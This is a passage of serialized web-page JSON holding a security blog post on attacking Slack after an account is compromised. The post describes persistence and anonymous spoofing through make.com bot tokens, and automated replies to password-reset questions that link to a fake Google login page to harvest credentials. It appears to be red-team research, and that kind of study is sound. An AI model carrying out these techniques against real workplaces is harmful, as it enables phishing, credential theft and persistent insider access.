3],{"nodeType":173,"value":268517,"marks":276024,"data":276025},[],{},{"nodeType":178,"data":276027,"content":276028},{},[276029],{"nodeType":173,"value":268524,"marks":276030,"data":276031},[],{},{"nodeType":178,"data":276033,"content":276034},{},[276035],{"nodeType":173,"value":268531,"marks":276036,"data":276037},[],{},{"nodeType":178,"data":276039,"content":276040},{},[276041,276044],{"nodeType":173,"value":268538,"marks":276042,"data":276043},[],{},{"nodeType":173,"value":10557,"marks":276045,"data":276047},[276046],{"type":1646},{},{"nodeType":312,"data":276049,"content":276052},{"target":276050},{"sys":276051},{"id":268549,"type":317,"linkType":318},[],{"nodeType":178,"data":276054,"content":276055},{},[276056],{"nodeType":173,"value":268555,"marks":276057,"data":276058},[],{},{"nodeType":312,"data":276060,"content":276063},{"target":276061},{"sys":276062},{"id":268562,"type":317,"linkType":318},[],{"nodeType":312,"data":276065,"content":276068},{"target":276066},{"sys":276067},{"id":268568,"type":317,"linkType":318},[],{"nodeType":178,"data":276070,"content":276071},{},[276072],{"nodeType":173,"value":268574,"marks":276073,"data":276074},[],{},{"nodeType":169,"data":276076,"content":276077},{},[276078],{"nodeType":173,"value":268581,"marks":276079,"data":276080},[],{},{"nodeType":178,"data":276082,"content":276083},{},[276084],{"nodeType":173,"value":268588,"marks":276085,"data":276086},[],{},{"nodeType":312,"data":276088,"content":276091},{"target":276089},{"sys":276090},{"id":268595,"type":317,"linkType":318},[],{"nodeType":312,"data":276093,"content":276096},{"target":276094},{"sys":276095},{"id":268601,"type":317,"linkType":318},[],{"nodeType":169,"data":276098,"content":276099},{},[276100],{"nodeType":173,"value":15539,"marks":276101,"data":276102},[],{},{"nodeType":178,"data":276104,"content":276105},{},[276106],{"nodeType":173,"value":268613,"marks":276107,"data":276108},[],{},{"nodeType":250,"data":276110,"content":276111},{},[276112,276121,276130,276139,276148,276196,276205],{"nodeType":254,"data":276113,"content":276114},{},[276115],{"nodeType":178,"data":276116,"content":276117},{},[276118],{"nodeType":173,"value":268626,"marks":276119,"data":276120},[],{},{"nodeType":254,"data":276122,"content":276123},{},[276124],{"nodeType":178,"data":276125,"content":276126},{},[276127],{"nodeType":173,"value":268636,"marks":276128,"data":276129},[],{},{"nodeType":254,"data":276131,"content":276132},{},[276133],{"nodeType":178,"data":276134,"content":276135},{},[276136],{"nodeType":173,"value":268646,"marks":276137,"data":276138},[],{},{"nodeType":254,"data":276140,"content":276141},{},[276142],{"nodeType":178,"data":276143,"content":276144},{},[276145],{"nodeType":173,"value":268656,"marks":276146,"data":276147},[],{},{"nodeType":254,"data":276149,"content":276150},{},[276151,276157],{"nodeType":178,"data":276152,"content":276153},{},[276154],{"nodeType":173,"value":268666,"marks":276155,"data":276156},[],{},{"nodeType":250,"data":276158,"content":276159},{},[276160,276169,276178,276187],{"nodeType":254,"data":276161,"content":276162},{},[276163],{"nodeType":178,"data":276164,"content":276165},{},[276166],{"nodeType":173,"value":268679,"marks":276167,"data":276168},[],{},{"nodeType":254,"data":276170,"content":276171},{},[276172],{"nodeType":178,"data":276173,"content":276174},{},[276175],{"nodeType":173,"value":268689,"marks":276176,"data":276177},[],{},{"nodeType":254,"data":276179,"content":276180},{},[276181],{"nodeType":178,"data":276182,"content":276183},{},[276184],{"nodeType":173,"value":268699,"marks":276185,"data":276186},[],{},{"nodeType":254,"data":276188,"content":276189},{},[276190],{"nodeType":178,"data":276191,"content":276192},{},[276193],{"nodeType":173,"value":268709,"marks":276194,"data":276195},[],{},{"nodeType":254,"data":276197,"content":276198},{},[276199],{"nodeType":178,"data":276200,"content":276201},{},[276202],{"nodeType":173,"value":268719,"marks":276203,"data":276204},[],{},{"nodeType":254,"data":276206,"content":276207},{},[276208],{"nodeType":178,"data":276209,"content":276210},{},[276211],{"nodeType":173,"value":268729,"marks":276212,"data":276213},[],{},{"nodeType":169,"data":276215,"content":276216},{},[276217],{"nodeType":173,"value":40632,"marks":276218,"data":276219},[],{},{"nodeType":178,"data":276221,"content":276222},{},[276223],{"nodeType":173,"value":268742,"marks":276224,"data":276225},[],{},{"nodeType":178,"data":276227,"content":276228},{},[276229],{"nodeType":173,"value":268749,"marks":276230,"data":276231},[],{},{"items":276233},[276234,276236],{"sys":276235,"name":505},{"id":504},{"sys":276237,"name":509},{"id":508},{"items":276239},[276240],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":276241},{"url":8615},{"__typename":1528,"sys":276243,"content":276244,"title":252406,"synopsis":259904,"hashTags":118,"publishedDate":259905,"slug":252407,"tagsCollection":276638,"authorsCollection":276644},{"id":228244},{"json":276245},{"data":276246,"content":276247,"nodeType":165},{},[276248,276264,276270,276276,276282,276298,276304,276320,276326,276332,276338,276344,276350,276356,276362,276378,276384,276390,276395,276401,276407,276413,276418,276423,276428,276434,276440,276445,276451,276457,276463,276468,276474,276480,276486,276492,276498,276503,276509,276515,276520,276526,276532,276537,276543,276549,276608,276614,276620,276626,276632],{"data":276249,"content":276250,"nodeType":178},{},[276251,276254,276261],{"data":276252,"marks":276253,"value":259462,"nodeType":173},{},[],{"data":276255,"content":276256,"nodeType":186},{"uri":88239},[276257],{"data":276258,"marks":276259,"value":88742,"nodeType":173},{},[276260],{"type":194},{"data":276262,"marks":276263,"value":259473,"nodeType":173},{},[],{"data":276265,"content":276266,"nodeType":178},{},[276267],{"data":276268,"marks":276269,"value":259480,"nodeType":173},{},[],{"data":276271,"content":276272,"nodeType":178},{},[276273],{"data":276274,"marks":276275,"value":259487,"nodeType":173},{},[],{"data":276277,"content":276278,"nodeType":169},{},[276279],{"data":276280,"marks":276281,"value":227960,"nodeType":173},{},[],{"data":276283,"content":276284,"nodeType":178},{},[276285,276288,276295],{"data":276286,"marks":276287,"value":37,"nodeType":173},{},[],{"data":276289,"content":276290,"nodeType":186},{"uri":208521},[276291],{"data":276292,"marks":276293,"value":227973,"nodeType":173},{},[276294],{"type":194},{"data":276296,"marks":276297,"value":227977,"nodeType":173},{},[],{"data":276299,"content":276300,"nodeType":169},{},[276301],{"data":276302,"marks":276303,"value":259516,"nodeType":173},{},[],{"data":276305,"content":276306,"nodeType":178},{},[276307,276310,276317],{"data":276308,"marks":276309,"value":37,"nodeType":173},{},[],{"data":276311,"content":276312,"nodeType":186},{"uri":63250},[276313],{"data":276314,"marks":276315,"value":63256,"nodeType":173},{},[276316],{"type":194},{"data":276318,"marks":276319,"value":259533,"nodeType":173},{},[],{"data":276321,"content":276322,"nodeType":169},{},[276323],{"data":276324,"marks":276325,"value":259540,"nodeType":173},{},[],{"data":276327,"content":276328,"nodeType":178},{},[276329],{"data":276330,"marks":276331,"value":259547,"nodeType":173},{},[],{"data":276333,"content":276334,"nodeType":178},{},[276335],{"data":276336,"marks":276337,"value":259554,"nodeType":173},{},[],{"data":276339,"content":276340,"nodeType":178},{},[276341],{"data":276342,"marks":276343,"value":259561,"nodeType":173},{},[],{"data":276345,"content":276346,"nodeType":178},{},[276347],{"data":276348,"marks":276349,"value":259568,"nodeType":173},{},[],{"data":276351,"content":276352,"nodeType":178},{},[276353],{"data":276354,"marks":276355,"value":259575,"nodeType":173},{},[],{"data":276357,"content":276358,"nodeType":169},{},[276359],{"data":276360,"marks":276361,"value":259582,"nodeType":173},{},[],{"data":276363,"content":276364,"nodeType":178},{},[276365,276368,276375],{"data":276366,"marks":276367,"value":259589,"nodeType":173},{},[],{"data":276369,"content":276370,"nodeType":186},{"uri":259592},[276371],{"data":276372,"marks":276373,"value":259598,"nodeType":173},{},[276374],{"type":194},{"data":276376,"marks":276377,"value":259602,"nodeType":173},{},[],{"data":276379,"content":276380,"nodeType":178},{},[276381],{"data":276382,"marks":276383,"value":259609,"nodeType":173},{},[],{"data":276385,"content":276386,"nodeType":178},{},[276387],{"data":276388,"marks":276389,"value":259616,"nodeType":173},{},[],{"data":276391,"content":276394,"nodeType":312},{"target":276392},{"sys":276393},{"id":259621,"type":317,"linkType":318},[],{"data":276396,"content":276397,"nodeType":178},{},[276398],{"data":276399,"marks":276400,"value":259629,"nodeType":173},{},[],{"data":276402,"content":276403,"nodeType":235},{},[276404],{"data":276405,"marks":276406,"value":259636,"nodeType":173},{},[],{"data":276408,"content":276409,"nodeType":178},{},[276410],{"data":276411,"marks":276412,"value":259643,"nodeType":173},{},[],{"data":276414,"content":276417,"nodeType":312},{"target":276415},{"sys":276416},{"id":259648,"type":317,"linkType":318},[],{"data":276419,"content":276422,"nodeType":312},{"target":276420},{"sys":276421},{"id":259654,"type":317,"linkType":318},[],{"data":276424,"content":276427,"nodeType":312},{"target":276425},{"sys":276426},{"id":259660,"type":317,"linkType":318},[],{"data":276429,"content":276430,"nodeType":235},{},[276431],{"data":276432,"marks":276433,"value":259668,"nodeType":173},{},[],{"data":276435,"content":276436,"nodeType":178},{},[276437],{"data":276438,"marks":276439,"value":259675,"nodeType":173},{},[],{"data":276441,"content":276444,"nodeType":312},{"target":276442},{"sys":276443},{"id":259680,"type":317,"linkType":318},[],{"data":276446,"content":276447,"nodeType":235},{},[276448],{"data":276449,"marks":276450,"value":259688,"nodeType":173},{},[],{"data":276452,"content":276453,"nodeType":178},{},[276454],{"data":276455,"marks":276456,"value":259695,"nodeType":173},{},[],{"data":276458,"content":276459,"nodeType":178},{},[276460],{"data":276461,"marks":276462,"value":259702,"nodeType":173},{},[],{"data":276464,"content":276467,"nodeType":312},{"target":276465},{"sys":276466},{"id":259707,"type":317,"linkType":318},[],{"data":276469,"content":276470,"nodeType":178},{},[276471],{"data":276472,"marks":276473,"value":259715,"nodeType":173},{},[],{"data":276475,"content":276476,"nodeType":169},{},[276477],{"data":276478,"marks":276479,"value":259722,"nodeType":173},{},[],{"data":276481,"content":276482,"nodeType":235},{},[276483],{"data":276484,"marks":276485,"value":259729,"nodeType":173},{},[],{"data":276487,"content":276488,"nodeType":178},{},[276489],{"data":276490,"marks":276491,"value":259736,"nodeType":173},{},[],{"data":276493,"content":276494,"nodeType":178},{},[276495],{"data":276496,"marks":276497,"value":259743,"nodeType":173},{},[],{"data":276499,"content":276502,"nodeType":312},{"target":276500},{"sys":276501},{"id":259748,"type":317,"linkType":318},[],{"data":276504,"content":276505,"nodeType":235},{},[276506],{"data":276507,"marks":276508,"value":259756,"nodeType":173},{},[],{"data":276510,"content":276511,"nodeType":178},{},[276512],{"data":276513,"marks":276514,"value":259763,"nodeType":173},{},[],{"data":276516,"content":276519,"nodeType":312},{"target":276517},{"sys":276518},{"id":259768,"type":317,"linkType":318},[],{"data":276521,"content":276522,"nodeType":178},{},[276523],{"data":276524,"marks":276525,"value":259776,"nodeType":173},{},[],{"data":276527,"content":276528,"nodeType":178},{},[276529],{"data":276530,"marks":276531,"value":259783,"nodeType":173},{},[],{"data":276533,"content":276536,"nodeType":312},{"target":276534},{"sys":276535},{"id":259788,"type":317,"linkType":318},[],{"data":276538,"content":276539,"nodeType":169},{},[276540],{"data":276541,"marks":276542,"value":15539,"nodeType":173},{},[],{"data":276544,"content":276545,"nodeType":178},{},[276546],{"data":276547,"marks":276548,"value":259802,"nodeType":173},{},[],{"data":276550,"content":276551,"nodeType":250},{},[276552,276561,276570,276589],{"data":276553,"content":276554,"nodeType":254},{},[276555],{"data":276556,"content":276557,"nodeType":178},{},[276558],{"data":276559,"marks":276560,"value":259815,"nodeType":173},{},[],{"data":276562,"content":276563,"nodeType":254},{},[276564],{"data":276565,"content":276566,"nodeType":178},{},[276567],{"data":276568,"marks":276569,"value":259825,"nodeType":173},{},[],{"data":276571,"content":276572,"nodeType":254},{},[276573],{"data":276574,"content":276575,"nodeType":178},{},[276576,276579,276586],{"data":276577,"marks":276578,"value":259835,"nodeType":173},{},[],{"data":276580,"content":276581,"nodeType":186},{"uri":259838},[276582],{"data":276583,"marks":276584,"value":259844,"nodeType":173},{},[276585],{"type":194},{"data":276587,"marks":276588,"value":37,"nodeType":173},{},[],{"data":276590,"content":276591,"nodeType":254},{},[276592],{"data":276593,"content":276594,"nodeType":178},{},[276595,276598,276605],{"data":276596,"marks":276597,"value":259857,"nodeType":173},{},[],{"data":276599,"content":276600,"nodeType":186},{"uri":259860},[276601],{"data":276602,"marks":276603,"value":259866,"nodeType":173},{},[276604],{"type":194},{"data":276606,"marks":276607,"value":37,"nodeType":173},{},[],{"data":276609,"content":276610,"nodeType":178},{},[276611],{"data":276612,"marks":276613,"value":259876,"nodeType":173},{},[],{"data":276615,"content":276616,"nodeType":235},{},[276617],{"data":276618,"marks":276619,"value":40632,"nodeType":173},{},[],{"data":276621,"content":276622,"nodeType":178},{},[276623],{"data":276624,"marks":276625,"value":259889,"nodeType":173},{},[],{"data":276627,"content":276628,"nodeType":178},{},[276629],{"data":276630,"marks":276631,"value":259896,"nodeType":173},{},[],{"data":276633,"content":276634,"nodeType":178},{},[276635],{"data":276636,"marks":276637,"value":259903,"nodeType":173},{},[],{"items":276639},[276640,276642],{"sys":276641,"name":505},{"id":504},{"sys":276643,"name":509},{"id":508},{"items":276645},[276646],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":276647},{"url":8615},{"items":276649},[276650],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":276651},{"url":8615},{"json":276653,"links":277460},{"data":276654,"content":276655,"nodeType":165},{},[276656,276674,276694,276701,276782,276788,276810,276816,276822,276828,276834,276864,276870,276906,276912,276917,276924,276943,276950,276957,276977,276999,277019,277026,277033,277040,277046,277053,277060,277067,277073,277079,277099,277106,277112,277118,277124,277131,277146,277152,277158,277165,277172,277179,277186,277193,277199,277206,277225,277231,277238,277244,277251,277257,277264,277271,277278,277285,277291,277298,277303,277309,277316,277323,277428,277434,277440,277447,277454],{"data":276657,"content":276658,"nodeType":178},{},[276659,276663,276670],{"data":276660,"marks":276661,"value":276662,"nodeType":173},{},[],"This is the fourth post in a series on attack chains formed by combining techniques in the ",{"data":276664,"content":276665,"nodeType":186},{"uri":88239},[276666],{"data":276667,"marks":276668,"value":88742,"nodeType":173},{},[276669],{"type":194},{"data":276671,"marks":276672,"value":276673,"nodeType":173},{},[]," and the second post of two focused on attacking instant messaging applications with Slack as the primary example. ",{"data":276675,"content":276676,"nodeType":178},{},[276677,276680,276690],{"data":276678,"marks":276679,"value":5039,"nodeType":173},{},[],{"data":276681,"content":276684,"nodeType":1698},{"target":276682},{"sys":276683},{"id":236132,"type":317,"linkType":318},[276685],{"data":276686,"marks":276687,"value":276689,"nodeType":173},{},[276688],{"type":194},"previous post",{"data":276691,"marks":276692,"value":276693,"nodeType":173},{},[]," focused on external attackers gaining an initial foothold during the initial access phase of the kill chain. In this post we’ll be focusing on persistence and lateral movement for an attacker that has already gained a foothold on a Slack tenant by compromising an internal account. ",{"data":276695,"content":276696,"nodeType":178},{},[276697],{"data":276698,"marks":276699,"value":276700,"nodeType":173},{},[],"We’ll build on the techniques in the previous post as well as introducing more and so will cover the following SaaS attack techniques, including chaining them together:",{"data":276702,"content":276703,"nodeType":250},{},[276704,276723,276742,276763],{"data":276705,"content":276706,"nodeType":254},{},[276707],{"data":276708,"content":276709,"nodeType":178},{},[276710,276713,276720],{"data":276711,"marks":276712,"value":37,"nodeType":173},{},[],{"data":276714,"content":276715,"nodeType":186},{"uri":197770},[276716],{"data":276717,"marks":276718,"value":264557,"nodeType":173},{},[276719],{"type":194},{"data":276721,"marks":276722,"value":37,"nodeType":173},{},[],{"data":276724,"content":276725,"nodeType":254},{},[276726],{"data":276727,"content":276728,"nodeType":178},{},[276729,276732,276739],{"data":276730,"marks":276731,"value":37,"nodeType":173},{},[],{"data":276733,"content":276734,"nodeType":186},{"uri":208435},[276735],{"data":276736,"marks":276737,"value":264576,"nodeType":173},{},[276738],{"type":194},{"data":276740,"marks":276741,"value":37,"nodeType":173},{},[],{"data":276743,"content":276744,"nodeType":254},{},[276745],{"data":276746,"content":276747,"nodeType":178},{},[276748,276751,276760],{"data":276749,"marks":276750,"value":37,"nodeType":173},{},[],{"data":276752,"content":276754,"nodeType":186},{"uri":276753},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/system_integrations/description.md",[276755],{"data":276756,"marks":276757,"value":276759,"nodeType":173},{},[276758],{"type":194},"SAT1036 - OAuth system integrations ",{"data":276761,"marks":276762,"value":37,"nodeType":173},{},[],{"data":276764,"content":276765,"nodeType":254},{},[276766],{"data":276767,"content":276768,"nodeType":178},{},[276769,276772,276779],{"data":276770,"marks":276771,"value":37,"nodeType":173},{},[],{"data":276773,"content":276774,"nodeType":186},{"uri":144083},[276775],{"data":276776,"marks":276777,"value":230156,"nodeType":173},{},[276778],{"type":194},{"data":276780,"marks":276781,"value":37,"nodeType":173},{},[],{"data":276783,"content":276784,"nodeType":169},{},[276785],{"data":276786,"marks":276787,"value":264586,"nodeType":173},{},[],{"data":276789,"content":276790,"nodeType":178},{},[276791,276796,276805],{"data":276792,"marks":276793,"value":276795,"nodeType":173},{},[276794],{"type":1646},"If you’ve just read the ",{"data":276797,"content":276800,"nodeType":1698},{"target":276798},{"sys":276799},{"id":236132,"type":317,"linkType":318},[276801],{"data":276802,"marks":276803,"value":276689,"nodeType":173},{},[276804],{"type":1646},{"data":276806,"marks":276807,"value":276809,"nodeType":173},{},[276808],{"type":1646},", you can skip this introductory piece and jump straight to the next section.",{"data":276811,"content":276812,"nodeType":178},{},[276813],{"data":276814,"marks":276815,"value":264601,"nodeType":173},{},[],{"data":276817,"content":276818,"nodeType":178},{},[276819],{"data":276820,"marks":276821,"value":264608,"nodeType":173},{},[],{"data":276823,"content":276824,"nodeType":178},{},[276825],{"data":276826,"marks":276827,"value":264615,"nodeType":173},{},[],{"data":276829,"content":276830,"nodeType":178},{},[276831],{"data":276832,"marks":276833,"value":264622,"nodeType":173},{},[],{"data":276835,"content":276836,"nodeType":250},{},[276837,276846,276855],{"data":276838,"content":276839,"nodeType":254},{},[276840],{"data":276841,"content":276842,"nodeType":178},{},[276843],{"data":276844,"marks":276845,"value":264635,"nodeType":173},{},[],{"data":276847,"content":276848,"nodeType":254},{},[276849],{"data":276850,"content":276851,"nodeType":178},{},[276852],{"data":276853,"marks":276854,"value":264645,"nodeType":173},{},[],{"data":276856,"content":276857,"nodeType":254},{},[276858],{"data":276859,"content":276860,"nodeType":178},{},[276861],{"data":276862,"marks":276863,"value":264655,"nodeType":173},{},[],{"data":276865,"content":276866,"nodeType":178},{},[276867],{"data":276868,"marks":276869,"value":264662,"nodeType":173},{},[],{"data":276871,"content":276872,"nodeType":178},{},[276873,276876,276883,276886,276893,276896,276903],{"data":276874,"marks":276875,"value":264669,"nodeType":173},{},[],{"data":276877,"content":276878,"nodeType":186},{"uri":264672},[276879],{"data":276880,"marks":276881,"value":264678,"nodeType":173},{},[276882],{"type":194},{"data":276884,"marks":276885,"value":264682,"nodeType":173},{},[],{"data":276887,"content":276888,"nodeType":186},{"uri":264685},[276889],{"data":276890,"marks":276891,"value":264691,"nodeType":173},{},[276892],{"type":194},{"data":276894,"marks":276895,"value":264695,"nodeType":173},{},[],{"data":276897,"content":276898,"nodeType":186},{"uri":264698},[276899],{"data":276900,"marks":276901,"value":264704,"nodeType":173},{},[276902],{"type":194},{"data":276904,"marks":276905,"value":1477,"nodeType":173},{},[],{"data":276907,"content":276908,"nodeType":178},{},[276909],{"data":276910,"marks":276911,"value":274952,"nodeType":173},{},[],{"data":276913,"content":276916,"nodeType":312},{"target":276914},{"sys":276915},{"id":169040,"type":317,"linkType":318},[],{"data":276918,"content":276919,"nodeType":169},{},[276920],{"data":276921,"marks":276922,"value":276923,"nodeType":173},{},[],"Slack apps - spoofing and persistence",{"data":276925,"content":276926,"nodeType":178},{},[276927,276930,276939],{"data":276928,"marks":276929,"value":273719,"nodeType":173},{},[],{"data":276931,"content":276934,"nodeType":1698},{"target":276932},{"sys":276933},{"id":236132,"type":317,"linkType":318},[276935],{"data":276936,"marks":276937,"value":276689,"nodeType":173},{},[276938],{"type":194},{"data":276940,"marks":276941,"value":276942,"nodeType":173},{},[],", we covered user spoofing and link preview spoofing attacks that can be conducted externally. But do we have any other options available once on the inside that wouldn’t be available to us externally? ",{"data":276944,"content":276945,"nodeType":178},{},[276946],{"data":276947,"marks":276948,"value":276949,"nodeType":173},{},[],"What happens if you compromise a Slack account and then want to persist and/or move laterally? Ordinarily, you can maintain access until session expiry or a password change is forced or the account is deactivated/deleted. For further actual impact, you could silently read messages as the user continues to operate their account but if you start sending out malicious links to other targets, in an attempt to move laterally, then the real user is probably going to become aware of the compromise very quickly from seeing the malicious messages in their own chat client.",{"data":276951,"content":276952,"nodeType":178},{},[276953],{"data":276954,"marks":276955,"value":276956,"nodeType":173},{},[],"Alternatively, what happens in a situation where a disgruntled employee is let go and their account is terminated? Could they maintain some level of access and use it maliciously?",{"data":276958,"content":276959,"nodeType":178},{},[276960,276964,276973],{"data":276961,"marks":276962,"value":276963,"nodeType":173},{},[],"One key feature that some IM apps like Slack have is app integrations to allow bots and other functionality, usually using OAuth under the hood. This allows very useful functionality for users, but also opens up a whole new angle for persistence and spoofing. In Slack’s case, its separation of ",{"data":276965,"content":276967,"nodeType":186},{"uri":276966},"https://api.slack.com/authentication/token-types",[276968],{"data":276969,"marks":276970,"value":276972,"nodeType":173},{},[276971],{"type":194},"user tokens and bot tokens",{"data":276974,"marks":276975,"value":276976,"nodeType":173},{},[]," allows for particularly interesting spoofing and persistence capabilities, which we’ll come to later.",{"data":276978,"content":276979,"nodeType":178},{},[276980,276984,276995],{"data":276981,"marks":276982,"value":276983,"nodeType":173},{},[],"We could probably write several posts on OAuth apps alone. In fact, we’ve written about ",{"data":276985,"content":276989,"nodeType":1698},{"target":276986},{"sys":276987},{"id":276988,"type":317,"linkType":318},"3QpljiYU9YHEUhd5gsvypj",[276990],{"data":276991,"marks":276992,"value":276994,"nodeType":173},{},[276993],{"type":194},"using OAuth for persistence",{"data":276996,"marks":276997,"value":276998,"nodeType":173},{},[]," more generally before. However, in this case we are going to focus on a couple examples of using a legitimate Slack app maliciously. ",{"data":277000,"content":277001,"nodeType":178},{},[277002,277006,277015],{"data":277003,"marks":277004,"value":277005,"nodeType":173},{},[],"In a previous blog post in this series, we spoke about ",{"data":277007,"content":277010,"nodeType":1698},{"target":277008},{"sys":277009},{"id":267879,"type":317,"linkType":318},[277011],{"data":277012,"marks":277013,"value":144086,"nodeType":173},{},[277014],{"type":194},{"data":277016,"marks":277017,"value":277018,"nodeType":173},{},[]," using SaaS automation apps. We’re going to follow this theme again here and show how they can also be used with Slack. Previously, we used Zapier as our automation app example, but this time we are going to use make.com. ",{"data":277020,"content":277021,"nodeType":235},{},[277022],{"data":277023,"marks":277024,"value":277025,"nodeType":173},{},[],"Persistent spoofing",{"data":277027,"content":277028,"nodeType":178},{},[277029],{"data":277030,"marks":277031,"value":277032,"nodeType":173},{},[],"We’ll show here how you can connect make.com to a Slack account you control and then maintain persistence, both as that user and partial access even if the account is deactivated or deleted, by using bot tokens. This is especially important in a disgruntled employee scenario as they could use this to maintain some level of access to Slack even if they were fired and had their account deleted. ",{"data":277034,"content":277035,"nodeType":178},{},[277036],{"data":277037,"marks":277038,"value":277039,"nodeType":173},{},[],"If we create a make.com account and click to create a new scenario, we can select Slack from the long list of integration possibilities. We’ll then be prompted to pick a specific Slack module. In more complicated scenarios, these can be chained together to take actions on events, but in this case we are going to create a simple scenario with just one module used to send a custom Slack message.",{"data":277041,"content":277045,"nodeType":312},{"target":277042},{"sys":277043},{"id":277044,"type":317,"linkType":318},"2k6NeCNERIL4zx3FtTD97p",[],{"data":277047,"content":277048,"nodeType":178},{},[277049],{"data":277050,"marks":277051,"value":277052,"nodeType":173},{},[],"If we select the module “Create a Message” we’ll be prompted to select a Slack connection to use and then fill out the other details for the module. Since we haven’t already created a Slack connection, we’ll be prompted to create a new one. For this module, we have the option of creating either a user token or a bot token. ",{"data":277054,"content":277055,"nodeType":178},{},[277056],{"data":277057,"marks":277058,"value":277059,"nodeType":173},{},[],"A user token has full capabilities and will continue to operate in the event of a password change. However, if the user account is deactivated or deleted then it will cease to work. In contrast, the bot connection is limited in capabilities compared to a full user token, but the advantage is that it will continue to operate even if the user account is deactivated or deleted.",{"data":277061,"content":277062,"nodeType":178},{},[277063],{"data":277064,"marks":277065,"value":277066,"nodeType":173},{},[],"This means gaining even temporary control of a Slack account, either through a user compromise or by being a disgruntled employee (or fired employee), could enable the permanent ability to spoof messages unless the entire app is revoked from Slack. Even with the high bar set by shadow workflows, that’s a pretty epic level of persistence!\n\nSo, we’re going to select the bot token for this example:",{"data":277068,"content":277072,"nodeType":312},{"target":277069},{"sys":277070},{"id":277071,"type":317,"linkType":318},"2Hx4QLlhLoXxoAVN7R72Tm",[],{"data":277074,"content":277078,"nodeType":312},{"target":277075},{"sys":277076},{"id":277077,"type":317,"linkType":318},"6oSc2GzeZh5vUhyKC8viMn",[],{"data":277080,"content":277081,"nodeType":178},{},[277082,277086,277095],{"data":277083,"marks":277084,"value":277085,"nodeType":173},{},[],"Now that we’ve finished setting up the bot connection, we can configure the specifics for the module itself. In this case, we’ll demonstrate using it to send the same type of spoofed message we covered in the ",{"data":277087,"content":277090,"nodeType":1698},{"target":277088},{"sys":277089},{"id":236132,"type":317,"linkType":318},[277091],{"data":277092,"marks":277093,"value":276689,"nodeType":173},{},[277094],{"type":194},{"data":277096,"marks":277097,"value":277098,"nodeType":173},{},[],", only it’ll be from a bot account. ",{"data":277100,"content":277101,"nodeType":178},{},[277102],{"data":277103,"marks":277104,"value":277105,"nodeType":173},{},[],"By default, it’ll use the name and icon of the Slack app, in this case Integromat (Make.com’s former name). Alternatively, we can choose to override this, which we will do in this case to mirror the user spoofing attacks we covered earlier. The only difference to a normal user message is there will be a small “APP” icon after the user. ",{"data":277107,"content":277111,"nodeType":312},{"target":277108},{"sys":277109},{"id":277110,"type":317,"linkType":318},"44kvbP0IYSIrp5anRtuVhN",[],{"data":277113,"content":277117,"nodeType":312},{"target":277114},{"sys":277115},{"id":277116,"type":317,"linkType":318},"225FeHRut5kzTuX1n0NDLt",[],{"data":277119,"content":277123,"nodeType":312},{"target":277120},{"sys":277121},{"id":277122,"type":317,"linkType":318},"1c5AcrsoegPrNwrXtdCCaJ",[],{"data":277125,"content":277126,"nodeType":178},{},[277127],{"data":277128,"marks":277129,"value":277130,"nodeType":173},{},[],"The other great advantage with this is that it’s difficult to see which user is actually responsible for the spoofing. If a compromised user account is used to send spoofed messages, not only may the real employee see the messages and alert security, but if the messages are investigated by a target or the security team, it’s quick to click on the user and see the real email address associated with the account. ",{"data":277132,"content":277133,"nodeType":178},{},[277134,277138,277143],{"data":277135,"marks":277136,"value":277137,"nodeType":173},{},[],"However, when it’s done with a bot token for an app, ",{"data":277139,"marks":277140,"value":277142,"nodeType":173},{},[277141],{"type":1646},"you can only see the Slack app that was responsible, not the actual user account it originated from",{"data":277144,"marks":277145,"value":39946,"nodeType":173},{},[],{"data":277147,"content":277151,"nodeType":312},{"target":277148},{"sys":277149},{"id":277150,"type":317,"linkType":318},"62F3HPZdrQqBrUDV47pjjL",[],{"data":277153,"content":277157,"nodeType":312},{"target":277154},{"sys":277155},{"id":277156,"type":317,"linkType":318},"7A8Run1271YslWTHNBqhc",[],{"data":277159,"content":277160,"nodeType":235},{},[277161],{"data":277162,"marks":277163,"value":277164,"nodeType":173},{},[],"Automated phishing replies",{"data":277166,"content":277167,"nodeType":178},{},[277168],{"data":277169,"marks":277170,"value":277171,"nodeType":173},{},[],"Ok, so we’ve just seen how you can internally spoof a message via a Slack app in a way that’s harder to track back to the original compromised user account and also achieve persistence at the same time. Pretty neat! But can we do more?",{"data":277173,"content":277174,"nodeType":178},{},[277175],{"data":277176,"marks":277177,"value":277178,"nodeType":173},{},[],"One of the great features of IM apps is the fact they are…well…instant! By making a slightly more sophisticated scenario with make.com, we can monitor public channels for messages that meet certain criteria and then immediately spoof a target phishing link as a reply. Phishing where the target is the one to reach out originally is much more likely to be successful as it’s more like a watering hole attack - the phishing message itself won’t be seen as unsolicited.",{"data":277180,"content":277181,"nodeType":178},{},[277182],{"data":277183,"marks":277184,"value":277185,"nodeType":173},{},[],"For example, let’s consider a scenario where someone has forgotten their password, or some other common IT support request, and they raise a question on a Slack channel about it. We could monitor for that and automatically respond. ",{"data":277187,"content":277188,"nodeType":178},{},[277189],{"data":277190,"marks":277191,"value":277192,"nodeType":173},{},[],"One caveat here is make.com requires we use a user token for the message monitoring part and therefore this attack couldn’t survive a deactivated/deleted Slack user account. However, it will still survive password changes and so is still a useful persistence option too. Additionally, the bot token can still be used for the message sending component in order to mask the source of the attack as above. ",{"data":277194,"content":277198,"nodeType":312},{"target":277195},{"sys":277196},{"id":277197,"type":317,"linkType":318},"4AdugwjwhzK5gdxojpqDwn",[],{"data":277200,"content":277201,"nodeType":178},{},[277202],{"data":277203,"marks":277204,"value":277205,"nodeType":173},{},[],"In this case, we have configured a Slack module to watch public channel messages using a user token and apply a filter on those containing the words “password” and “reset”. If that is the case, we then trigger a spoofed threaded reply using the bot token and impersonating an “IT bot” and giving a link to documentation for how to perform a self-service password request. ",{"data":277207,"content":277208,"nodeType":178},{},[277209,277213,277221],{"data":277210,"marks":277211,"value":277212,"nodeType":173},{},[],"This makes use of the same link preview spoofing techniques we covered in the ",{"data":277214,"content":277217,"nodeType":1698},{"target":277215},{"sys":277216},{"id":236132,"type":317,"linkType":318},[277218],{"data":277219,"marks":277220,"value":276689,"nodeType":173},{},[],{"data":277222,"marks":277223,"value":277224,"nodeType":173},{},[]," and the actual link will present a fake Google login page to harvest credentials.  